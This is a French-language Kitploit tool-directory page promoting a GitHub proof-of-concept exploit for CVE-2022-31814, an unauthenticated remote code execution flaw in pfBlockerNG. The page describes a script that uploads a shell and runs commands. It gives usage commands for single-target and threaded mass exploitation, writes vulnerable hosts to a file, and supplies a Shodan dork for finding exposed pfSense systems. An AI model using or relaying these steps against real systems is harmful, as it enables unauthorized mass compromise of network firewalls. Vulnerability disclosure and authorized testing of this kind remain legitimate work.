Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-31814 — pfBlockerNG <= 2.1.4_26 RCE non authentifiée (CVE-2022-31814) | Kitploit
Outils/GitHubGitHub/dkstar11q/cve-2022-31814
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubdkstar11q/cve-2022-31814

CVE-2022-31814

pfBlockerNG <= 2.1.4_26 RCE non authentifiée (CVE-2022-31814)

Voir le dépôt
1il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

pfBlockerNG <= 2.1.4_26 RCE non authentifiée

Ce script est une preuve de concept d'exploit pour pfBlockerNG <= 2.1.4_26 qui permet l'exécution de code à distance. Il prend une URL cible unique ou une liste d'URLs, téléverse un shell, exécute une commande, puis supprime le shell.

Prérequis

Ce script nécessite Python 3.x et les modules requests et concurrent.futures. Vous pouvez installer ces modules en exécutant :

root@kitploit:~
pip3 install requests concurrent.futures

ou

root@kitploit:~
pip3 install -r requirements.txt

Utilisation

root@kitploit:~
usage: exploit.py [-h] [-c COMMAND] [-l LIST] [-i IP] [-t THREADS] [-o OUTPUT]

pfBlockerNG <= 2.1.4_26 Unauth RCE

options:
  -h, --help            show this help message and exit
  -c COMMAND, --command COMMAND
                        Console Command ('id')
  -l LIST, --list LIST  List of targets (list.txt)
  -i IP, --ip IP        Base target uri (ex. http://target-uri/)
  -t THREADS, --threads THREADS
                        Number of threads for mass scan
  -o OUTPUT, --output OUTPUT
                        Output file (vuln.txt)

Cible unique

Pour exploiter une cible unique, utilisez l'option -i ou --ip et spécifiez l'URL de base ou l'adresse IP :

root@kitploit:~
python3 exploit.py -i http://target-uri/ -c 'id'

Cibles multiples

Pour scanner une liste de cibles, utilisez l'option -l ou --list et spécifiez le chemin vers la liste :

root@kitploit:~
python3 exploit.py -l list.txt -c 'id' -t 50

L'option -t ou --threads peut être utilisée pour spécifier le nombre de threads à utiliser pour le scan.

Sortie

Si l'option -o ou --output est spécifiée, la liste des cibles vulnérables sera écrite dans un fichier :

root@kitploit:~
python3 exploit.py -l list.txt -c 'id' -o vuln.txt

Shodan Dork:

root@kitploit:~
http.title:"pfSense - Login" "Server: nginx" "Set-Cookie: PHPSESSID="

⚠️ Avertissement

Ce script est uniquement à des fins éducatives. Utilisez-le à vos propres risques.

Télécharger l’outil